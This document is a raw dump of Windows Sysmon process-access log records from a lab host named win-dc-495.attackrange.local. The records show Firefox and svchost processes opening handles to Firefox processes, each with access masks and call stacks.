Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18 10341000x800000000000000017016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+1011628|C:\Program Files\Mozilla Firefox\xul.dll+1042fa9|C:\Program Files\Mozilla Firefox\xul.dll+2bb7134|C:\Program Files\Mozilla Firefox\xul.dll+101d89a|C:\Program Files\Mozilla Firefox\xul.dll+f82f80|C:\Program Files\Mozilla Firefox\xul.dll+f845d3|C:\Program Files\Mozilla Firefox\xul.dll+a7a56f|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18 10341000x800000000000000017015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.505{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.505{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.505{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.489{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.489{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.489{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106d041|C:\Program Files\Mozilla Firefox\xul.dll+1724d76|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000017000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3905-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86f16|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 